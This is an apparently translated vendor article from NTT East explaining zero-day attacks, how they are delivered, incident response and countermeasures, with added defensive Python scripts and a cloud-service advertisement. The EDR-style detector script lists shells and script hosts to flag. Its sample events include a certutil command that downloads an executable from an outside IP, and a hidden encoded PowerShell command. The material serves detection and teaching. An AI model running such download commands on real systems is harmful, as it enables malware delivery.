
An easy-to-understand explanation of zero-day attacks | How they work, damage cases, and countermeasures

A zero-day attack is a cyberattack that exploits a flaw in an OS or piece of software (a vulnerability) before the patch that fixes that flaw has been released.

Vulnerabilities are unavoidable in OSs and software, which are built from complex programs. When a developer receives a vulnerability report, it publishes a patch to fix the flaw as quickly as it can. However:

  • There is inevitably a time lag before the patch is released
  • Attackers may find a vulnerability before the developer does

For these reasons, a vulnerability can be exploited while no fix exists yet, and that is what makes it a zero-day attack.

A zero-day attack can cause damage such as unauthorized access that takes over a computer or internal system, or a malware infection that steals or destroys data.

In today's IT-driven business environment, any company can become a target of a zero-day attack.

In the latest "10 Major Security Threats 2022" published by the Information-technology Promotion Agency (IPA), zero-day attacks appeared in the ranking for the first time, in 7th place, which shows how seriously this threat now needs to be taken.

Here are five recommended ways to combat zero-day attacks:

5 best ways to fight zero-day attacks
  • Thoroughly implement basic measures
  • Introduce a sandbox environment
  • Encrypt and isolate sensitive information
  • Have a third party confirm the presence or absence of vulnerabilities
  • Introduce EDR products

In this article, we explain the basic knowledge and countermeasures you need in order to respond appropriately to zero-day attacks.

[Contents of this article]

  • What is a zero-day attack?
  • Impact of a zero-day attack
  • Typical examples of zero-day attacks targeting vulnerabilities
  • What to do if you are hit by a zero-day attack
  • How to combat zero-day attacks

By understanding these points, you will be able to grasp what a zero-day attack looks like and take the countermeasures your company needs.

As long as you use IT tools, be sure to understand the typical cyberattacks and take proper countermeasures, so that irreversible situations such as information leaks and system shutdowns can be avoided.

1. What is a zero-day attack?


A zero-day attack is a type of cyberattack that exploits vulnerabilities (security holes) in operating systems and software.

"Zero-day" means "day 0".

The name comes from the timing relative to the patch: if the day the fix becomes available for download is day 1, the attack is launched on day 0, before any fix exists.

For example, if a vulnerability is found in the operating system of an internal system, a zero-day attack against it could be used to steal the information held in that system before the developer has shipped a fix.

*What is a vulnerability (security hole)?

  • A weak point in the security of an OS or software caused by a flaw in its program
  • If a vulnerability is left unattended, the system can easily be infected with malware or accessed illegally, so the correction program (patch) should be applied as soon as possible
  • Vulnerabilities themselves are not rare; they are found regularly and vary in severity, so the basic rule is to apply each patch or update as soon as the developer releases it

Zero-day attacks are distinctive only in their timing; the content and routes of the attacks are much the same as other cyberattacks. To protect an organization from them, understand the characteristics and examples of such attacks and thoroughly implement the basic countermeasures against cyberattacks in general.

1-1. Why are zero-day attacks troublesome?

Zero-day attacks are often described as particularly troublesome. This is because they are hard to prevent completely and hard to notice quickly.

Characteristics of zero-day attacks
It is difficult to completely prevent attacks
  • Because the vulnerability is attacked before the fix is released, the attack can succeed even on a machine that applies updates promptly
  • Security software that relies on signatures of past attacks may not recognize the new malware used in a zero-day attack
It is difficult to quickly notice that you have been attacked
  • Security software detects cyberattacks by matching known patterns, so an attack that the developer has not yet been able to respond to may go undetected

To counter zero-day attacks, which frequent updates and security software cannot fully prevent, combine them with measures that limit the damage, such as encrypting important stored data. Countermeasures are explained in detail in "5. How to combat zero-day attacks".

1-2. [Latest Trends] Zero-day attacks ranked 7th among the top 10 information security threats

In the latest IPA "Top 10 Information Security Threats", which is compiled from actual incidents that had a major impact on society, zero-day attacks were ranked 7th, appearing in the list for the first time.

[Latest] Top 10 information security threats for organizations
1st place Ransomware
2nd place Targeted attacks
3rd place Exploitation of supply-chain weaknesses
4th place Attacks targeting telework and similar new ways of working
5th place Information leakage by insiders
6th place Attacks timed to the disclosure of vulnerability information
7th place Zero-day attacks
8th place E-mail scams (business e-mail fraud)
9th place IT infrastructure failure
10th place Information leakage due to negligence

Any company that uses the Internet and IT tools in its business can be a target of zero-day attacks. To avoid unexpected damage, understand the attack methods properly.

1-3. Common zero-day attack methods

Two delivery methods are common in zero-day attacks:

(1) Sending an e-mail with malware attached

(2) Tampering with a website so that visitors download a file containing malware

Typical methods of zero-day attacks
(1) E-mail with malware attached
  • Two variants exist: indiscriminate (mass-mailing) attacks and targeted attacks
  • In the indiscriminate type, e-mails disguised as business correspondence and carrying malware are sent to an unspecified number of companies and staff
  • In the targeted type, e-mails carrying malware and disguised as coming from business partners, customers, or acquaintances are sent only to the chosen targets
(2) Website defacement
  • The attacker defaces a website by exploiting a vulnerability in the site itself
  • Visitors are then infected simply by viewing the page (a drive-by download), or are led to a link that downloads the malware

In a zero-day attack, the malware delivered through these e-mails and websites exploits a vulnerability for which no patch has yet been released, for example in the viewer that opens the attachment or in the browser that renders the page.

Given these standard delivery methods, self-defense measures such as the following are effective:

  • Do not open e-mail attachments carelessly, even when they appear to come from acquaintances such as business partners
  • Do not browse websites that are unrelated to work

2. Two types of damage caused by zero-day attacks


The most common types of damage caused by a zero-day attack are (1) unauthorized access and (2) malware infection.

Specific examples of zero-day attacks
(1) Unauthorized access [Concrete examples]

  • Unauthorized access to and hijacking of an internal system, followed by distribution of malware to every device connected to it
  • Unauthorized access to VPN equipment and theft of the authentication credentials stored on it
[Case example]
A shared folder was hit by a zero-day attack and, as a result of the unauthorized access, the personal information of 200 people was leaked. The vulnerability targeted was one the developer was not yet aware of.
(2) Malware infection [Concrete example]

  • Infection with malware that steals customer information
[Case example]
In a large-scale incident, a manufacturer's internal system was breached through a zero-day attack and thousands of personal records were leaked. The attacker used the zero-day exploit to get into the internal system, then spread malware through it across the company and stole a large amount of information.

If a zero-day attack cannot be prevented, it can cause damage ranging from a system becoming unusable or being hijacked to information being leaked.

3. Three kinds of software commonly targeted by zero-day attacks, and countermeasures

The software whose vulnerabilities have typically been targeted by zero-day attacks falls into three categories:

Software typically targeted by zero-day attacks
  • OS
  • Web browser
  • Server software

Large-scale zero-day attacks tend to involve open-source programs and programs with a large number of users and products, because a single vulnerability there reaches many victims.

Given this trend, companies that

  • actively adopt open-source programs,
  • are digitizing rapidly, or
  • promote location-independent work styles such as telework that rely on the Internet

are more likely to be affected by zero-day attacks, simply because they run more of the targeted software and expose more of it.

Now, let’s take a closer look at each program targeted for the vulnerability.

3-1. OS

A zero-day attack on an OS vulnerability can let an attacker plant a backdoor and hijack the device. For example, it becomes possible to:

  • Hijack a computer to extract information or spread malware
  • Abuse the webcam
  • Read the router credentials stored on the device

[How to counter such threats?]

  • Thorough basic security measures such as installing security software and applying OS updates promptly
  • Regularly check published information about vulnerabilities and cyberattacks
  • Know which software runs on which of your devices, so that the scope of impact of a zero-day attack can be determined quickly
  • Monitor network activity daily

3-2. Web browser

The web browser used to access the Internet has been targeted by zero-day attacks many times in the past.

One example of a zero-day attack on a browser vulnerability was an attempt to hijack the PCs of an online exchange by combining the exploit with targeted e-mails. In that case the exchange responded promptly and no damage resulted.

Browsers developed and provided by major vendors are no exception; if a vulnerability in one is exploited, the computer running it is at risk, so caution is required.

[How to counter such threats?]

  • Keep track of which web browsers (and which versions) are in use across your organization
  • Gather vulnerability information for the browsers you use
  • Thorough basic security measures such as installing security software and applying OS and browser updates promptly
  • Monitor network connection logs daily

3-3. Server software

Zero-day attacks on server software, the software that provides functions and data such as messaging and databases, are also common.

There were signs of a zero-day attack on a vendor's e-mail server software. Although the actual damage in that case was limited, there was a risk of various consequences, such as a backdoor being installed to steal data or intercept communications.

[How to counter such threats?]

  • Know what software your organization uses
  • Collect information about the vulnerabilities of the software you use
  • If you judge the risk of a zero-day attack to be high and no fix is available, temporarily stop using the software or cut off its exposure
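As an added example (not code from the original article), the following Python script shows how the two lists recommended in sections 3-1 and 3-3, an inventory of what software runs where and the vulnerability information collected for it, can be combined to work out the scope of impact. The inventory, the advisories, and the product names are constructed sample data; the field names and the priority scheme are assumptions. An advisory with no fixed version yet is the zero-day case: every installed copy is affected, and the ones reachable from the Internet get the highest priority for a workaround or for being taken offline.

```python
"""Scope-of-impact check: match an asset inventory against vulnerability advisories.

Added example, not code from the original article. All data below is constructed;
product names, field names and the priority scheme are assumptions.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Asset:
    host: str
    product: str
    version: str
    exposed: bool  # reachable from the Internet (VPN gateway, mail server, ...)


@dataclass(frozen=True)
class Advisory:
    advisory_id: str
    product: str
    fixed_in: Optional[str]  # version that fixes the flaw; None = no patch yet (zero-day)


@dataclass(frozen=True)
class Finding:
    host: str
    advisory_id: str
    priority: str  # P1 (highest) .. P3
    action: str


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '15.1.2' into (15, 1, 2) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in version.split("."))


def is_affected(asset: Asset, adv: Advisory) -> bool:
    """Affected if the asset runs the product and is older than the fixed version.
    With no fixed version published yet, every installed copy is affected."""
    if asset.product != adv.product:
        return False
    if adv.fixed_in is None:
        return True
    return parse_version(asset.version) < parse_version(adv.fixed_in)


def prioritize(asset: Asset, adv: Advisory) -> str:
    zero_day = adv.fixed_in is None
    if zero_day and asset.exposed:
        return "P1"  # unpatchable and reachable from outside: restrict or take offline now
    if zero_day or asset.exposed:
        return "P2"
    return "P3"


def assess(inventory: List[Asset], advisories: List[Advisory]) -> List[Finding]:
    """Return findings sorted by priority; the stable sort keeps inventory order within a priority."""
    findings = []
    for asset in inventory:
        for adv in advisories:
            if not is_affected(asset, adv):
                continue
            if adv.fixed_in is None:
                action = "no patch yet: apply vendor workaround, restrict access, or stop the service"
            else:
                action = f"update {adv.product} to {adv.fixed_in}"
            findings.append(Finding(asset.host, adv.advisory_id, prioritize(asset, adv), action))
    return sorted(findings, key=lambda f: f.priority)


# Constructed sample inventory and advisories (not real products or advisories).
SAMPLE_INVENTORY = [
    Asset("vpn-gw-01", "ExampleVPN", "8.2.1", exposed=True),
    Asset("mail-01", "ExampleMail", "15.1.2", exposed=True),
    Asset("file-01", "ExampleFileShare", "3.0.0", exposed=False),
    Asset("ws-044", "ExampleBrowser", "110.0.1", exposed=False),
]
SAMPLE_ADVISORIES = [
    Advisory("ADV-0001", "ExampleVPN", fixed_in=None),          # exploited, no patch yet
    Advisory("ADV-0002", "ExampleMail", fixed_in="15.1.3"),     # patch available
    Advisory("ADV-0003", "ExampleBrowser", fixed_in="110.0.1"), # already at the fixed version
    Advisory("ADV-0004", "ExampleFileShare", fixed_in=None),    # no patch, internal only
]

if __name__ == "__main__":
    for f in assess(SAMPLE_INVENTORY, SAMPLE_ADVISORIES):
        print(f"{f.priority} {f.host:<10} {f.advisory_id}: {f.action}")
```

Run against the sample data, the VPN gateway comes out as the only P1 (no fix and Internet-facing), the mail server as a P2 that can simply be updated, and the internal file server as a P2 that needs a workaround; the workstation whose browser is already at the fixed version produces no finding. The version comparison is deliberately numeric: comparing "9.9.9" and "10.0.2" as strings would put the older one first and hide the exposure.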

4. What to do in the event of a zero-day attack

The initial response when you discover that a zero-day attack has taken place is as follows.

What to do if you are hit by a zero-day attack

1. Disconnect from the network

2. Contact the department that manages security

3. Scan and remove with security software

Whether or not you can take an appropriate initial response will determine whether you can minimize the damage or allow it to expand, so be sure to understand what you should do in normal times.

4-1. Disconnect from network

The first thing to do after a zero-day attack is to disconnect the affected device, site, etc.

Specifically, take the following actions.

  • Disconnect from the Internet
  • Disconnect from the company network
  • If a website is affected, take it offline immediately

Besides cutting off the attacker's access, this prevents the infection from spreading to other devices and users.

4-2. Contact the department that manages security

Once the device is isolated from the network and further spread has been stopped, contact your company's security management department as soon as possible.

You will need to explain what happened from the discovery of the attack up to now and the current response status (for example, that the attacked terminal has been isolated), but the priority is to get the first report in quickly.

In the event of malware infection, unauthorized access, or information leakage, a report to the security measures committee will be necessary, so discuss with the management department how to proceed with the response.

You can check the report format and other information on the Information-technology Promotion Agency (IPA) website.

4-3. Scan and remove with security software

Once you have shared the information with the internal security management department, check the detailed infection status and the damage, and if malware is present, remove it. Detection and removal can be done with security software and tools.

In some cases the security software cannot deal with the infection and the machine must be reinitialized (wiped and reinstalled). Reinitializing recovers the system, but at the same time the traces of the intrusion (logs and so on) disappear, so preserve that evidence first and decide only after consulting the security management department.

Also, because a machine may have to be reinitialized after a zero-day attack, back up necessary data regularly, ideally daily.
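The caveat above, that reinitializing destroys the traces of the intrusion, is the reason responders collect evidence before the wipe. The following Python script is an added example (not from the original article) of the minimum worth doing: copy the relevant files into a timestamped archive, record a SHA-256 manifest so the copies can later be shown to be unaltered, and verify the archive. The file paths are assumptions; `demo()` builds a temporary directory with constructed sample log lines in place of a real host.

```python
"""Preserve intrusion traces before a compromised machine is reinitialized.

Added example, not code from the original article. It packs the given files into a
timestamped tar.gz archive, writes a SHA-256 manifest next to it, and can verify that
the archived copies still match. Paths are assumptions; demo() uses a temporary
directory with constructed sample logs instead of a real host.
"""
import hashlib
import os
import tarfile
import tempfile
from datetime import datetime, timezone
from typing import Dict, List, Tuple


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def preserve(paths: List[str], out_dir: str, label: str) -> Tuple[str, Dict[str, str]]:
    """Archive the files that exist, write <archive>.sha256, return (archive path, manifest).

    Missing files are skipped rather than aborting: on a compromised host it is better
    to keep what is still there than to fail on the first gap."""
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    archive = os.path.join(out_dir, f"{label}-{stamp}.tar.gz")
    manifest: Dict[str, str] = {}
    with tarfile.open(archive, "w:gz") as tar:
        for path in paths:
            if not os.path.isfile(path):
                continue
            manifest[path] = sha256_file(path)          # hash the original before copying
            tar.add(path, arcname=path.lstrip("/"))      # keep the full path inside the archive
    with open(archive + ".sha256", "w") as f:
        for path, digest in manifest.items():
            f.write(f"{digest}  {path}\n")
    return archive, manifest


def verify(archive: str, manifest: Dict[str, str]) -> bool:
    """Re-hash every member inside the archive and compare it with the manifest."""
    with tarfile.open(archive, "r:gz") as tar:
        for path, digest in manifest.items():
            member = tar.extractfile(path.lstrip("/"))
            if member is None or sha256_bytes(member.read()) != digest:
                return False
    return True


def demo() -> Tuple[int, bool]:
    """Constructed scenario: two log files plus one missing path, preserved before reimaging.
    Returns (number of files archived, verification result)."""
    work = tempfile.mkdtemp()
    logs = {  # constructed sample log lines
        "auth.log": "May  1 09:12:09 ws-044 sshd[4121]: Accepted password for svc-backup from 203.0.113.5\n",
        "proc.log": "2024-05-01T09:12:09Z parent=winword.exe image=powershell.exe\n",
    }
    for name, text in logs.items():
        with open(os.path.join(work, name), "w") as f:
            f.write(text)
    wanted = [os.path.join(work, n) for n in ("auth.log", "proc.log", "does-not-exist.log")]
    archive, manifest = preserve(wanted, work, "ws-044")
    return len(manifest), verify(archive, manifest)


if __name__ == "__main__":
    print(demo())
```

Store the archive and its `.sha256` file somewhere other than the machine being wiped. Files on disk are only part of the picture: running processes, network connections, and anything else held only in memory vanish when the machine is powered off, so capture those (or a memory image) before disconnecting or reinitializing if the security management department will want them.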

5. How to combat zero-day attacks


Here are five recommended ways to combat zero-day attacks:

5 main ways to combat zero-day attacks
  • Thoroughly implement basic measures
  • Introduce a sandbox environment
  • Encrypt and isolate sensitive information
  • Have a third party confirm the presence or absence of vulnerabilities
  • Introduce EDR products

Let’s check what kind of measures are taken.

5-1. Thorough implementation of basic measures

The first thing to do is to thoroughly implement the following three basic measures :

  • Apply OS and software updates as soon as they are released
  • Install security software
  • Do not open unknown attachments, links, and the like

If these three are not in place, you will not be able to prevent ordinary cyberattacks, let alone zero-day attacks. Remember that the basics matter in security measures too.

5-2. Introduce a sandbox environment

A sandbox is an isolated area in which the exchange of data with the outside is strictly controlled. Because it is isolated, even if you open data infected with malware inside it, nothing outside the sandbox is affected.

When you must open and check data whose safety is uncertain, you can do so with far less risk by trying it in the sandbox first. Note that some malware detects when it is running in a sandbox and stays dormant, so a clean result is not proof that a file is safe.

Even if staff are told to treat unknown data with caution, in a business environment they may have no choice but to open it; preparing a sandbox provides both safety and convenience.

5-3. Encrypt and isolate important information

To prepare for zero-day attacks, which are difficult to prevent completely, it is essential to have a mechanism that limits the damage when an attack does get through. That is why important information should be encrypted and isolated.

If you must store data in an area exposed to zero-day attacks, keep it encrypted, with the keys held somewhere the attacker cannot reach from the same system. And store data that must never be exfiltrated in an isolated area, not in one likely to be affected by a zero-day attack.

5-4. Have a third party confirm the presence or absence of vulnerabilities

It is also recommended to have a third party who is familiar with security, such as a professional contractor, check whether there are any vulnerabilities in the current security.

If countermeasures are taken only in-house, fatal vulnerabilities may remain unaddressed because nobody has looked at the environment from the perspective of the attackers who carry out cyberattacks.

If you don’t have a cybersecurity-savvy department in your company, consider a third-party vulnerability assessment.

5-5. Introduce EDR products

If a zero-day attack does get through, an EDR product is a sound countermeasure. EDR stands for Endpoint Detection and Response: detection and response on the endpoints, the PCs and servers at the edge of the network.

With EDR installed on each device, abnormal behaviour is detected and reported, and the affected device can be isolated and its processes stopped.

Because suspicious activity can be dealt with quickly, even a successful zero-day attack can be contained before it spreads.
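The "abnormal behaviour" that EDR looks for is what lets it catch an exploit with no signature. As an added example (not code from the original article and not any EDR product's logic), the Python below runs a few behavioural rules over process-creation events: a document viewer or browser launching a shell or script host is the pattern produced when a malicious attachment (section 1-3, method 1) or a drive-by download (method 2) exploits the viewer, whatever the vulnerability is. The event format, the rule lists, and the sample lines are all constructed for this example.

```python
"""Behaviour-based detection over process-creation events (EDR-style).

Added example, not code from the original article or from any EDR product. Instead of
matching signatures of known malware it flags parent/child process pairs that are rarely
legitimate. The event format, rule lists and sample lines are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Assumed event format (constructed for this example), one event per line:
# <UTC timestamp> host=<name> parent=<image> image=<image> cmd="<command line>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)

# Process categories used by the rules (a representative list, not an exhaustive one).
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
BROWSER_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS_AND_SCRIPT_HOSTS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
# -e / -enc / -EncodedCommand: a base64 payload handed to PowerShell, common in droppers.
ENCODED_PS = re.compile(r"(^|\s)-e(nc|ncodedcommand)?\s", re.IGNORECASE)


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Return the event fields, or None for a line that does not match the format."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return the name of the first rule the event matches, or None."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    if image in SHELLS_AND_SCRIPT_HOSTS and parent in DOCUMENT_PARENTS:
        return "document-spawned-shell"   # malicious attachment: exploit or macro
    if image in SHELLS_AND_SCRIPT_HOSTS and parent in BROWSER_PARENTS:
        return "browser-spawned-shell"    # drive-by download / browser exploit
    if image in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(event["cmd"]):
        return "encoded-powershell"       # obfuscated payload, regardless of parent
    return None


def detect(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Run the rules over every line; return (host, timestamp, rule, image) for each alert."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue  # malformed line: skip it, never crash the detector
        rule = classify(event)
        if rule is not None:
            alerts.append((event["host"], event["ts"], rule, event["image"]))
    return alerts


# Constructed sample events: an attachment opened in Word that spawns PowerShell six
# seconds later, a browser spawning cmd.exe to fetch a file, and benign activity.
SAMPLE_EVENTS = [
    '2024-05-01T09:12:03Z host=ws-044 parent=explorer.exe image=winword.exe cmd="WINWORD.EXE /n invoice.docx"',
    '2024-05-01T09:12:09Z host=ws-044 parent=winword.exe image=powershell.exe cmd="powershell.exe -nop -w hidden -enc AAAAAAAAAAAA"',
    '2024-05-01T09:15:41Z host=ws-017 parent=chrome.exe image=cmd.exe cmd="cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.exe a.exe"',
    '2024-05-01T09:20:00Z host=ws-017 parent=explorer.exe image=cmd.exe cmd="cmd.exe /c dir"',
    '2024-05-01T09:21:10Z host=srv-02 parent=services.exe image=powershell.exe cmd="powershell.exe -File backup.ps1"',
    'this line is not a process event',
]

if __name__ == "__main__":
    for host, ts, rule, image in detect(SAMPLE_EVENTS):
        print(f"{ts} {host}: {rule} ({image})")
```

Two of the six lines raise alerts: the Word-to-PowerShell pair on ws-044 and the Chrome-to-cmd.exe pair on ws-017. The user-launched `cmd.exe /c dir` and the scheduled backup script do not, because the rules key on who launched the shell, not on the shell itself. In a real EDR these rules run as the events happen and can trigger the isolation described above; they also need an allowlist, because some legitimate add-ins and automation do produce these pairs.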

If you want to always use the cloud with the latest security, consult NTT East
    • "I want to take security measures without much effort"

    • "I want to use cloud services, but I'm worried about whether they can handle zero-day attacks."

If that is how you feel, NTT East's cloud introduction and operation services for AWS / Microsoft Azure are worth considering.

    • NTT East provides a secure connection line in addition to a highly secure cloud.
    • For example, it proposes solutions for needs such as:
  • Accessing confidential and personal information in the cloud when needed, without storing it on the local computer
  • Creating an environment where employees can securely connect to the company network and work anytime, anywhere
  • Always having the latest information security environment for servers without the hassle of maintaining it
    • NTT East has many cloud professionals, including AWS-certified engineers, and know-how from over 150 cloud implementations, so it can build the cloud environment that fits customer needs.
    • Because it builds and supports solutions for cloud migration and network issues through a single point of contact, it can strengthen security as a whole.
    • 24-hour, 365-day operation and maintenance support is available for monitoring, notification, failure reception, primary response, and operation outsourcing, so the latest cybersecurity measures can be maintained without burdening the person in charge.
    • Tell us your concerns and requests regarding security across terminals, networks, and clouds. With the support of NTT East's cloud professionals, we will build an environment where you can concentrate on your work with peace of mind.
    • Please feel free to contact us.

6. Summary

A zero-day attack is a cyberattack that exploits a vulnerability in a program before the patch that fixes it is released. The name comes from the timing: if the day the patch becomes available for download is day 1, the attack takes place on day 0.

If zero-day attacks cannot be completely prevented, there is a risk of various damages such as the system becoming unusable, being hijacked, and information being leaked.
